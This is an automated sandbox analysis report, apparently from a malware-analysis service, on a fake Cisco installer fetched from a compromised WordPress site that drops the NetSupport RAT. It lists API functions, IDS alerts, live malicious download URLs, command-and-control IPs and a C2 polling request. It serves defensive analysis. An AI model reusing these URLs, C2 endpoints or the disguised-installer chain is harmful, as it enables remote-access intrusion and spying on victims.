                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,12_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,12_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C4F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C4DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C17C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C4FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C4DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 4x nop then add byte ptr [edi], dh (12_2_68C08468)

                                  Networking

                                  Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.11.20:49756 -> 151.236.16.15:443
                                  Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.11.20:49758 -> 199.188.200.195:443
                                  Source: Network traffic Suricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.11.20:49755 -> 54.37.62.77:443
                                  Source: Yara match File source: amsi32_3588.amsi.csv, type: OTHER
                                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1, type: DROPPED
                                  Source: Yara match File source: C:\Program Files (x86)\Cisco\unins000.dat, type: DROPPED
                                  Source: is-2UOIT.tmp.6.dr Static PE information: Found NDIS imports: FwpsCalloutRegister1, FwpsCalloutRegister0, FwpmFilterDeleteById0, FwpmBfeStateSubscribeChanges0, FwpsCalloutUnregisterById0, FwpmFilterAdd0, FwpsStreamInjectAsync0, FwpsQueryPacketInjectionState0, FwpsInjectTransportReceiveAsync0, FwpsInjectTransportSendAsync0, FwpsConstructIpHeaderForTransportPacket0, FwpsFreeCloneNetBufferList0, FwpsAllocateCloneNetBufferList0, FwpsFreeNetBufferList0, FwpsAllocateNetBufferAndNetBufferList0, FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpsApplyModifiedLayerData0, FwpsAcquireWritableLayerDataPointer0, FwpsReleaseClassifyHandle0, FwpsAcquireClassifyHandle0, FwpmBfeStateUnsubscribeChanges0, FwpmEngineOpen0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmTransactionCommit0, FwpmTransactionAbort0, FwpmProviderAdd0, FwpmProviderDeleteByKey0, FwpmSubLayerAdd0, FwpmSubLayerDeleteByKey0, FwpmCalloutAdd0, FwpmCalloutDeleteById0
                                  Source: is-LQ9L3.tmp.6.dr Static PE information: Found NDIS imports: FwpmEngineClose0, FwpmFilterAdd0, FwpmTransactionAbort0, FwpmFilterDeleteById0, FwpmTransactionBegin0, FwpmGetAppIdFromFileName0, FwpmEngineOpen0, FwpmSubLayerDeleteByKey0, FwpmSubLayerAdd0, FwpmTransactionCommit0, FwpmProviderAdd0, FwpmProviderDeleteByKey0
                                  Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global traffic HTTP traffic detected: GET /wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Accept: */* Accept-Encoding: identity Host: asknetsupertech.com Connection: Keep-Alive
                                  Source: global traffic DNS traffic detected: DNS query: asknetsupertech.com
                                  Source: global traffic DNS traffic detected: DNS query: payiki.com
                                  Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: global traffic DNS traffic detected: DNS query: anyhowdo.com
                                  Source: unknown HTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 151.236.16.15 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                  Source: wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-edit
                                  Source: wget.exe, 00000002.00000002.68846552333.00000000012F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
                                  Source: wget.exe, 00000002.00000002.68846552333.00000000012F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeeDriv
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: is-4ES8I.tmp.6.drString found in binary or memory: https://curl.se/docs/alt-svc.html
                                  Source: is-4ES8I.tmp.6.drString found in binary or memory: https://curl.se/docs/hsts.html
                                  Source: is-4ES8I.tmp.6.drString found in binary or memory: https://curl.se/docs/http-cookies.html
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                                  Source: CiscoSetup.exe, 00000005.00000000.68859027882.0000000000A91000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: wget.exe, wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com14
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                                  Source: CiscoSetup.exe, 00000005.00000003.69255300451.0000000002BB3000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.00000000029FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com
                                  Source: CiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/support
                                  Source: CiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/update
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iminunet.com
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iminunet.comPara
                                  Source: is-K762I.tmp.6.dr, is-HNAJ2.tmp.6.drString found in binary or memory: https://www.immunet.com
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.immunet.com.
                                  Source: is-NL2AM.tmp.6.drString found in binary or memory: https://www.immunet.comA
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.immunet.comAby
                                  Source: is-K762I.tmp.6.drString found in binary or memory: https://www.immunet.comPour
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.immunet.comVoor
                                  Source: CiscoSetup.exe, 00000005.00000003.68864558047.000000007E80B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000005.00000003.68863864836.0000000003050000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000000.68867343710.0000000000BD1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.innosetup.com/
                                  Source: is-C05BP.tmp.6.drString found in binary or memory: https://www.openssl.org/
                                  Source: CiscoSetup.exe, 00000005.00000003.68864558047.000000007E80B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000005.00000003.68863864836.0000000003050000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000000.68867343710.0000000000BD1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.remobjects.com/ps
                                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
                                  Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
                                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
                                  Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
                                  Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
                                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
                                  Source: unknown HTTPS traffic detected: 54.37.62.77:443 -> 192.168.11.20:49755 version: TLS 1.2

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11088380 SetWindowsHookExA 00000002,Function_00087920,00000000,00000000
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11032930 GetClipboardFormatNameA,SetClipboardData
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_11032930 GetClipboardFormatNameA,SetClipboardData
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,CreateFontIndirectA,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                  Source: Yara match File source: 11.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 13.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 12.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 12.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara match File source: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara match File source: 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: client32.exe PID: 4288, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: client32.exe PID: 7744, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: client32.exe PID: 4252, type: MEMORYSTR
                                  Source: Yara match File source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-NL0T9.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.cat (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-43RVH.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva-6.cat (copy)

                                  Spam, unwanted Advertisements and Ransom Demands

                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA

                                  System Summary

                                  Source: amsi32_3588.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Process Stats: CPU usage > 6%
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_110A9240: DeviceIoControl
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_1115A340 FindWindowA,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Process token adjusted: Security
Source: CiscoSetup.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-HMVS5.tmp.6.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-SHB4H.tmp.6.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: CiscoSetup.exe.2.dr | Static PE information: Number of sections : 11 > 10
Source: CiscoSetup.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: is-HMVS5.tmp.6.dr | Static PE information: Number of sections : 11 > 10
Source: amsi32_3588.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.win@14/539@4/4
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_11059270 GetLastError,FormatMessageA,LocalFree
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_1109C7E0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 12_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 12_2_1109C7E0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: 11_2_11088290 FindResourceA,LoadResource,LockResource
Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp | File created: C:\Program Files (x86)\Cisco
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\cmdline.out
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:304:WilStaging_02
